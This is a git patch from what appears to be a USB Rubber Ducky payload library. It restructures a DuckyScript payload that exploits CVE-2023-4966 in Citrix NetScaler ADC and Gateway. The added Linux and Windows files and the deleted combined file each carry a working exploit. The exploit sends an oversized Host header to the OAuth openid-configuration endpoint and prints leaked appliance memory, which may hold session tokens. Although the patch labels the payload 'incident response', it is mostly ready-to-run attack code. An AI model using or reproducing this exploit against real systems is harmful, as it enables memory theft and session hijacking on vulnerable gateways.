From 0933d313fb1a63cedc65baf8c9d5eede1c0abde0 Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 11 Dec 2023 16:42:28 +0100 Subject: [PATCH] Removing the CapsLock Error --- .../README.md | 10 +- .../gnu-linux_payload.txt | 33 ++++++ .../payload.txt | 102 ------------------ .../windows-payload.txt | 42 ++++++++ 4 files changed, 76 insertions(+), 111 deletions(-) create mode 100644 payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/gnu-linux_payload.txt delete mode 100644 payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt create mode 100644 payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/windows-payload.txt diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md index 3507828..d6bba9b 100644 --- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md @@ -55,11 +55,6 @@ The sole configuration parameter that requires modification is the hostname, whi DEFINE #HOSTNAME 192.168.1.200 ``` -## DuckyScript Extensions Used - -- **DETECT_READY**: Extension used to check whether the machine is ready to execute the payload without making unnecessary waits. [[2](#sources)] -- **PASSIVE_WINDOWS_DETECT**: Extension used to check which operating system you are operating on so that you have a valid tool for both Windows and different systems, for instance GNU/Linux systems. [[3](#sources)] - ## Payload Description Windows In this line, a variable named `$header_value` is created, containing a string of 24576 'a' characters. This variable represents the value to be used in the HTTP header. @@ -172,9 +167,6 @@ After assigning execute permissions, the above command allows the user to run th ## Sources - [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967 -- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready -- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt -- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/ ## Credits @@ -196,4 +188,4 @@ After assigning execute permissions, the above command allows the user to run th - \ No newline at end of file + diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/gnu-linux_payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/gnu-linux_payload.txt new file mode 100644 index 0000000..93e878f --- /dev/null +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/gnu-linux_payload.txt @@ -0,0 +1,33 @@ +REM ################################################################################ +REM # # +REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # +REM # Author : Aleff # +REM # Version : 1.0 # +REM # Category : incident-response # +REM # Target : Citrix NetScaler ADV; NetScaler Gateway # +REM # # +REM ################################################################################ + +REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200) +DEFINE #HOSTNAME example + +DEALY 2000 +CTRL-ALT t +DELAY 1000 + +STRINGLN_BLOCK + header_value=$(yes a | head -n 24576 | tr -d '\n') + + headers="-H 'Host:$header_value'" + + response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) + + if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then + echo "--- Dumped memory ---" + echo "$response" | cut -c 131051- + echo "The #HOSTNAME is vulnerable!" + echo "--- End ---" + else + echo "Could not dump memory" + fi +END_STRINGLN diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt deleted file mode 100644 index 19176ea..0000000 --- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt +++ /dev/null @@ -1,102 +0,0 @@ -REM ################################################################################ -REM # # -REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # -REM # Author : Aleff # -REM # Version : 1.0 # -REM # Category : incident-response # -REM # Target : Citrix NetScaler ADV; NetScaler Gateway # -REM # # -REM ################################################################################ - -REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200) -DEFINE #HOSTNAME example - -REM Detect what in what OS is running the payload -EXTENSION PASSIVE_WINDOWS_DETECT - REM VERSION 1.1 - REM AUTHOR: Korben - - REM_BLOCK DOCUMENTATION - Windows fully passive OS Detection and passive Detect Ready - Includes its own passive detect ready. - Does not require additional extensions. - - USAGE: - Extension runs inline (here) - Place at beginning of payload (besides ATTACKMODE) to act as dynamic - boot delay - $_OS will be set to WINDOWS or NOT_WINDOWS - See end of payload for usage within payload - END_REM - - REM CONFIGURATION: - DEFINE #MAX_WAIT 150 - DEFINE #CHECK_INTERVAL 20 - DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 - DEFINE #NOT_WINDOWS 7 - - $_OS = #NOT_WINDOWS - - VAR $MAX_TRIES = #MAX_WAIT - WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) - DELAY #CHECK_INTERVAL - $MAX_TRIES = ($MAX_TRIES - 1) - END_WHILE - IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN - $_OS = WINDOWS - END_IF -END_EXTENSION - - -REM Payload content -IF ($_OS == WINDOWS) THEN - - REM Open a powershell - GUI r - DELAY 500 - STRING powershell - ENTER - DELAY 1000 - - STRINGLN_BLOCK - $header_value = 'a' * 24576 - $header_value = $header_value -replace "\n", "" - - $headers="-H 'Host:$header_value'" - - $headers = @{ - 'Host' = $header_value - } - $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" - $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10 - - if ($response.Substring(0, 3) -eq "200") { - Write-Host "--- Dumped memory ---" - $response.Substring(131050) # 131051 - 1 - Write-Host "The #HOSTNAME is vulnerable!" - Write-Host "--- End ---" - } else { - Write-Host "Could not dump memory" - } - END_STRINGLN -ELSE - CTRL-ALT t - DELAY 1000 - - STRINGLN_BLOCK - header_value=$(yes a | head -n 24576 | tr -d '\n') - - headers="-H 'Host:$header_value'" - - response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) - - if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then - echo "--- Dumped memory ---" - echo "$response" | cut -c 131051- - echo "The #HOSTNAME is vulnerable!" - echo "--- End ---" - else - echo "Could not dump memory" - fi - END_STRINGLN -END_IF diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/windows-payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/windows-payload.txt new file mode 100644 index 0000000..7cfb88d --- /dev/null +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/windows-payload.txt @@ -0,0 +1,42 @@ +REM ################################################################################ +REM # # +REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # +REM # Author : Aleff # +REM # Version : 1.0 # +REM # Category : incident-response # +REM # Target : Citrix NetScaler ADV; NetScaler Gateway # +REM # # +REM ################################################################################ + +REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200) +DEFINE #HOSTNAME example + +REM Open a powershell +DELAY 2000 +GUI r +DELAY 500 +STRING powershell +ENTER +DELAY 1000 + +STRINGLN_BLOCK + $header_value = 'a' * 24576 + $header_value = $header_value -replace "\n", "" + + $headers="-H 'Host:$header_value'" + + $headers = @{ + 'Host' = $header_value + } + $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" + $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10 + + if ($response.Substring(0, 3) -eq "200") { + Write-Host "--- Dumped memory ---" + $response.Substring(131050) # 131051 - 1 + Write-Host "The #HOSTNAME is vulnerable!" + Write-Host "--- End ---" + } else { + Write-Host "Could not dump memory" + } +END_STRINGLN